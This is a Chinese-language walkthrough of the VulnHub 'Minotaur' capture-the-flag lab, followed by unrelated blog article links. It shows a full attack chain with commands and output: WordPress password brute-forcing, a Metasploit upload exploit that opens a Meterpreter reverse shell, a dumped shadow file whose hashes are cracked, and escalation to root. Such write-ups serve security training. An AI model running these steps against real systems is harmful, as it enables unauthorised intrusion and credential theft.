[vulnhub] SecTalks:BNE0x00 - Minotaur

https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/

主机发现端口扫描

  1. 使用nmap扫描网段类存活主机

    因为靶机是我最后添加的,所以靶机IP是172

    nmap -sP 192.168.75.0/24
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 15:36 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00016s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00013s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.172
    Host is up (0.00014s latency).
    MAC Address: 00:0C:29:CA:6B:E4 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00019s latency).
    MAC Address: 00:50:56:EC:C5:A4 (VMware)
    Nmap scan report for 192.168.75.151
    Host is up.
    
  2. 扫描主机开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.172
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 15:37 CST
    Nmap scan report for 192.168.75.172
    Host is up (0.00097s latency).
    Not shown: 65532 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    2020/tcp open  xinupageserver
    
  3. 扫描主机服务版本以及系统版本

    nmap -sV -sT -O -p80,22,2020 192.168.75.172
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 15:38 CST
    Nmap scan report for 192.168.75.172
    Host is up (0.00037s latency).
    
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
    2020/tcp open  ftp     vsftpd 2.0.8 or later
    MAC Address: 00:0C:29:CA:6B:E4 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

     nmap -script=vuln -p 80,22,2020 192.168.75.172
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 15:38 CST
    Nmap scan report for 192.168.75.172
    Host is up (0.00048s latency).
    
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-slowloris-check:
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    2020/tcp open  xinupageserver
    
    

    2020端口是vsftp 不过显示xinupageserver 不认识

    2020 > 80 >22

vsftp

  1. 使用匿名帐户登录,啥也没有

    ftp 192.168.75.172 2020
    Connected to 192.168.75.172.
    220 Welcome to minotaur FTP service.
    Name (192.168.75.172:root): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    229 Entering Extended Passive Mode (|||60294|).
    150 Here comes the directory listing.
    226 Directory send OK.
    ftp>
    

web渗透

  1. 访问主页,是apache默认主页

  2. 扫描目录,扫出个/flag.txt

    dirsearch -u 192.168.75.172 -x 403
    [15:54:07] Starting:
    [15:54:35] 200 -   47B  - /flag.txt
    
    Task Completed
    

    访问得到flagA

    # flag.txt
    Oh, lookey here. A flag!
    Th15 15 @N 3@5y f1@G!
    

    没头绪了,怀疑目录爆破不完全,换字典尝试

  3. 尝试了几个字典终于找出了新目录 bull

    https://github.com/TheKingOfDuck/fuzzDicts

    字典连接,使用fuzz/paramDict/dir.txt 爆破出来的

  4. 访问新目录

    在这里插入图片描述

    发现是WordPress 4.2.2

  5. 直接使用wpscan

    wpscan --url 192.168.75.172/bull/ -e u
    

    枚举出用户bully ,尝试爆破,尝试了常规字典爆破无法枚举出来,看靶机官网底下写着需要额外的字典,所以可能是让我们生成字典

生成字典

  1. 使用cewl生成cms关键字字典,生成最短密码长度为6的密码字典

    cewl http://192.168.75.172/bull -m 6 > wordlist.txt
    
  2. 然后再使用John来生成更多密码组合

    john --wordlist=wordlist.txt --rules --stdout > words-john.txt
    
  3. 再尝试使用新生成的字典去爆破

    wpscan --url 192.168.75.172/bull/ -U bully -P words-john.txt
    //
    [SUCCESS] - bully / Bighornedbulls
    

    枚举出密码Bighornedbulls

拿到shell

  1. 我这里的wpscan扫不出任何漏洞(可能是我IP配置不正确的问题),查看了WP发现有个幻灯片插件存在漏洞,并且在MSF下有利用脚本

    msf6 > use exploit/unix/webapp/wp_slideshowgallery_upload
    msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set rhosts 192.168.75.172
    rhosts => 192.168.75.172
    msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /bull/
    targeturi => /bull/
    msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set WP_PASSWORD Bighornedbulls
    WP_PASSWORD => Bighornedbulls
    msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set WP_USER bully
    WP_USER => bully
    msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > run
    
    [*] Started reverse TCP handler on 192.168.75.151:4444
    [*] Trying to login as bully
    [*] Trying to upload payload
    [*] Uploading payload
    [*] Calling uploaded file klccanyg.php
    [*] Sending stage (39927 bytes) to 192.168.75.172
    [+] Deleted klccanyg.php
    [*] Meterpreter session 1 opened (192.168.75.151:4444 -> 192.168.75.172:36399) at 2024-10-30 18:07:17 +0800
    
    

提权

  1. 查看权限

    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    $ whoami
    www-data
    $ uname -a
    Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
    
  2. 寻找敏感文件

    • /tmp 文件夹下存在flag.txt以及shadow.bak

      # flag.txt
      That shadow.bak file is probably useful, hey?
      Also, you found a flag!
      My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h y@R|)
      
      
      # shadow.bak
      root:$6$15/OlfJP$h70tk3qikcf.kfwlGpYT7zfFg.cRzlJMlbVDSj3zCg4967ZXG0JzN/6oInrnvGf7AZaJFE2qJdBAOc/3AyeGX.:16569:0:99999:7:::
      daemon:*:16484:0:99999:7:::
      bin:*:16484:0:99999:7:::
      sys:*:16484:0:99999:7:::
      sync:*:16484:0:99999:7:::
      games:*:16484:0:99999:7:::
      man:*:16484:0:99999:7:::
      lp:*:16484:0:99999:7:::
      mail:*:16484:0:99999:7:::
      news:*:16484:0:99999:7:::
      uucp:*:16484:0:99999:7:::
      proxy:*:16484:0:99999:7:::
      www-data:*:16484:0:99999:7:::
      backup:*:16484:0:99999:7:::
      list:*:16484:0:99999:7:::
      irc:*:16484:0:99999:7:::
      gnats:*:16484:0:99999:7:::
      nobody:*:16484:0:99999:7:::
      libuuid:!:16484:0:99999:7:::
      syslog:*:16484:0:99999:7:::
      mysql:!:16569:0:99999:7:::
      messagebus:*:16569:0:99999:7:::
      landscape:*:16569:0:99999:7:::
      sshd:*:16569:0:99999:7:::
      minotaur:$6$3qaiXwrS$1Ctbj1UPpzKjWSgpIaUH0PovtO2Ar/IshWUe4tIUrJf8VlbIIijxdu4xHsXltA0mFavbo701X9.BG/fVIPD35.:16582:0:99999:7:::
      ftp:*:16573:0:99999:7:::
      heffer:$6$iH6pqgzM$3nJ00ToM38a.qLqcW8Yv0pdRiO/fXOvNv03rBzv./E0TO4B8y.QF/PNZ2JrghQTZomdVl3Zffb/MkWrFovWUi/:16582:0:99999:7:::
      h0rnbag:$6$nlapGOqY$Hp5VHWq388mVQemkiJA2U1qLI.rZAFzxCw7ivfyglRNgZ6mx68sE1futUy..m7dYJRQRUWEpm3XKihXPB9Akd1:16582:0:99999:7:::
      
  3. 尝试爆破

    • 将泄露密码的几个账户保存为users.txt

      john users.txt 
      //
      Using default input encoding: UTF-8
      Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
      Cost 1 (iteration count) is 5000 for all loaded hashes
      Will run 8 OpenMP threads
      Proceeding with single, rules:Single
      Press 'q' or Ctrl-C to abort, almost any other key for status
      Almost done: Processing the remaining buffered candidate passwords, if any.
      Proceeding with wordlist:/usr/share/john/password.lst
      Password1        (heffer)     
      obiwan6          (minotaur)     
      

      把两个用户的密码爆破出来了

    • 尝试用ssh登录

      ssh minotaur@192.168.75.172
      minotaur@192.168.75.172's password:
      Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.16.0-30-generic i686)
      
       * Documentation:  https://help.ubuntu.com/
      
        System information as of Thu Oct 31 02:36:26 AEDT 2024
      
        System load: 0.72              Memory usage: 9%   Processes:       162
        Usage of /:  7.3% of 18.81GB   Swap usage:   0%   Users logged in: 0
      
        Graph this data and manage this system at:
          https://landscape.canonical.com/
      
      Last login: Wed May 27 16:55:30 2015
      minotaur@minotaur:~$ sudo -l
      Matching Defaults entries for minotaur on minotaur:
          env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
      
      User minotaur may run the following commands on minotaur:
          (root) NOPASSWD: /root/bullquote.sh
          (ALL : ALL) ALL
      minotaur@minotaur:~$
      

      意外发现minotaur的权限和root相等

      minotaur@minotaur:~$ sudo -i
      [sudo] password for minotaur:
      root@minotaur:~#
      

      读取flag.txt

      
      root@minotaur:~# cat flag.txt
      Congrats! You got the final flag!
      Th3 Fl@g is: 5urr0nd3d bY @r$3h0l35
      
      root@minotaur:~# cat quotes.txt
      And for me the only way to live life is to grab the bull but the horns and call up recording studios and set dates to go in recording studios. To try and accomplish somthing.
      If you can't dazzle them with brilliance, baffle them with bull.
      I admire bull riders for their passion and the uniqueness each one of them has.
      I am a huge bull on this country. We will not have a double-dip recession at all. I see our businesses coming back almost across the board.
      Not only the bull attacks his enemies with curved horn, but also the sheep, when harmed fights fights back.
      Sometimes I'm kind of spacey. I'm like Ferdinand the bull, sniffing the daisey, not aware of time, of what's going on in the world.
      There comes a time in the affairs of man when he must take the bull by the tail and face the situation.
      Bulls do not win full fights. People do.
      

总结

增强对字典生成能力,以及敏感目录的查找

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/904979.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

回溯算法-Java【力扣】【算法学习day.14】

前言 ###我做这类文档一个重要的目的还是给正在学习的大家提供方向&#xff08;例如想要掌握基础用法&#xff0c;该刷哪些题&#xff1f;&#xff09;我的解析也不会做的非常详细&#xff0c;只会提供思路和一些关键点&#xff0c;力扣上的大佬们的题解质量是非常非常高滴&am…

uniapp和vite项目配置多环境编译,增加测试环境变量配置--mode test

如果你的项目是使用vite和uniapp配置开发的&#xff0c;就可以在代码里面获取到这些变量&#xff0c;但是开发&#xff0c;测试和发布是不同的请求地址&#xff0c;所以需要配置。Vite 使用 dotenv 从你的 环境目录 中的下列文件加载额外的环境变量&#xff1a; .env …

CUDA环境安装终极指南——Linux(其它系统也一样)

文章目录 前言检查驱动配置nvcc安装cudnn完活 前言 不用看其它文章了&#xff0c;这篇文章保你不踩任何坑&#xff0c;安装方法简单快速 检查驱动 检查驱动是否安装&#xff0c;输入以下命令 nvidia-smi如果驱动已经安装&#xff0c;则可跳过此步&#xff0c;否则&#xff…

学习笔记:ElasticSearch搜索引擎

学习视频&#xff1a;【尚硅谷】ElasticSearch教程入门到精通&#xff08;基于ELK技术栈elasticsearch 7.x8.x新特性&#xff09; 学习笔记&#xff1a;Elasticsearch学习笔记 目录 第1章 Elasticsearch概述01. 开篇02. 技术选型 2. 第二章 ElasticSearch入门03. 环境准备04. …

工业协议网关:物联网时代的智慧桥梁

在物联网技术蓬勃发展的今天&#xff0c;工业协议网关作为连接工业设备和物联网系统的关键设备&#xff0c;正在发挥着越来越重要的作用。本文将带您深入了解工业协议网关的功能、应用场景以及它在工业智能化进程中的重要作用。 什么是工业协议网关&#xff1f; 工业协议网关…

机器学习中的嵌入是什么?

一、说明 嵌入是真实世界对象的数字表示&#xff0c;机器学习&#xff08;ML&#xff09;和人工智能&#xff08;AI&#xff09;系统利用它来像人类一样理解复杂的知识领域。例如&#xff0c;计算算法了解 2 和 3 之间的差为 1&#xff0c;这表明与 2 和 100 相比&#xff0c;2…

Python | Leetcode Python题解之第517题超级洗衣机

题目&#xff1a; 题解&#xff1a; class Solution:def findMinMoves(self, machines: List[int]) -> int:tot sum(machines)n len(machines)if tot % n:return -1avg tot // nans, s 0, 0for num in machines:num - avgs numans max(ans, abs(s), num)return ans

【PTA】4-1 计算二叉树最大的宽度 【数据结构】

二叉树的最大宽度是指二叉树所有层中结点个数的最大值。例如&#xff1a;下面二叉树的宽度为4. 输入二叉树的完全前序序列建立一棵二叉树&#xff08;上机作业2&#xff1a;二叉树的建立和遍历&#xff09;&#xff0c;编写算法计算并输出二叉树的宽度。 输入格式: 二叉树数据…

开源智能文档处理系统,助力医疗数据精准管理与高效整合

问题导向&#xff1a; 当前医疗文档中信息零散、数据整合度低&#xff0c;导致人工管理难度加大&#xff0c;错误率高。思通数科的系统在此背景下提供了免费的开源工具&#xff0c;帮助医疗机构实现数据的高效、精准管理&#xff0c;支持实时数据提取和智能管理。 客户案例&am…

STM32使用串口下载程序

STM32使用串口下载程序 FluMcu软件下载地址 单片机在线编程网 STM32 MCU启动模式配置(Boot Configuration) 单片机复位后&#xff0c;SYSCLK的第4个上升沿&#xff0c;BOOT引脚上的值将锁存&#xff0c;用户可以通过设置BOOT0和BOOT1引脚的值&#xff0c;来选择复位后的启动…

新兴斗篷cloak技术,你了解吗?

随着互联网技术的飞速发展&#xff0c;网络营销领域也经历了翻天覆地的变革。 从最早的网络横幅广告到如今主流的搜索引擎和社交媒体营销&#xff0c;广告形式变得越来越多样。 其中&#xff0c;搜索引擎广告一直以其精准投放而备受青睐&#xff0c;但近年来&#xff0c;一项名…

WPF+MVVM案例实战(十四)- 封装一个自定义消息弹窗控件(下)

文章目录 1、案例效果2、弹窗空间使用1.引入用户控件2、按钮命令实现 3、总结4、源代码获取 1、案例效果 2、弹窗空间使用 1.引入用户控件 打开 Wpf_Examples 项目&#xff0c;在引用中添加用户控件库&#xff0c;在 MainWindow.xaml 界面引用控件库&#xff0c;代码如下&…

教材管理系统设计与实现

教材管理系统设计与实现 1. 系统概述 教材管理系统是一个基于PHP和SQL的Web应用程序&#xff0c;旨在为学校提供一个高效的教材管理平台。该系统可以帮助管理员录入教材信息、教师查询和申请教材、学生查询教材信息&#xff0c;提高教材管理的效率和透明度。 2. 技术栈 前端…

【时间序列分析】平稳时间序列分析——Wold分解定理和延迟算子

Wold分解定理 &#xff08;这个定理是平稳时间序列分析的理论基石。&#xff09; 对于任意一个离散平稳时间序列, 它都可以分解为两个不相关的平稳序列之和, 其中一个为确定性的 (deterministic), 另一个为随机性的(stochastic) xₜVₜξₜ&#xff0c;{V₁} 为确定性平稳序列…

基于SpringBoot的汽车配件销售管理系统

作者&#xff1a;计算机学姐 开发技术&#xff1a;SpringBoot、SSM、Vue、MySQL、JSP、ElementUI、Python、小程序等&#xff0c;“文末源码”。 专栏推荐&#xff1a;前后端分离项目源码、SpringBoot项目源码、Vue项目源码、SSM项目源码、微信小程序源码 精品专栏&#xff1a;…

数图携手黄商集团,打造品类空间精细化管理体系!

数图合作伙伴又1 在这秋高气爽的时节&#xff0c;满怀激情地传递着喜人的消息&#xff1a;数图的合作伙伴队伍再次壮大。位于湖北黄冈的黄商集团&#xff0c;勇于拥抱时代发展的数字变革潮流&#xff0c;积极致力于探索精细化的品类空间管理之道&#xff0c;一步一个脚印&…

大模型日报|3 篇必读的大模型论文

大家好&#xff0c;今日必读的大模型论文来啦&#xff01; 1.SocialGPT&#xff1a;贪婪分段提示优化实现社会关系推理 社会关系推理旨在从图像中识别朋友、配偶和同事等关系类别。虽然目前的方法采用了使用标注图像数据端到端训练专用网络的模式&#xff0c;但这些方法在通用…

Unity计算二维向量夹角余弦值和正弦值的优化方法参考

如果不考虑优化问题&#xff0c;计算两个向量的余弦值或者正弦值可以直接使用类似的方法&#xff1a; [SerializeField] Vector2 v1, v2;void Start() {float valCos Mathf.Acos(Vector2.SignedAngle(v1, v2));float valSin Mathf.Asin(Vector2.SignedAngle(v1, v2)); } 但是…

利用EasyExcel实现简易Excel导出

目标 通过注解形式完成对一个方法返回值的通用导出功能 工程搭建 pom <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.apache.org/POM/4.0.0" xmlns:xsi"http://www.w3.org/2001/XMLSchema-instance&qu…

Spring Boot框架:校园社团信息管理的现代化解决方案

3系统分析 3.1可行性分析 通过对本校园社团信息管理系统实行的目的初步调查和分析&#xff0c;提出可行性方案并对其一一进行论证。我们在这里主要从技术可行性、经济可行性、操作可行性等方面进行分析。 3.1.1技术可行性 本校园社团信息管理系统采用SSM框架&#xff0c;JAVA作…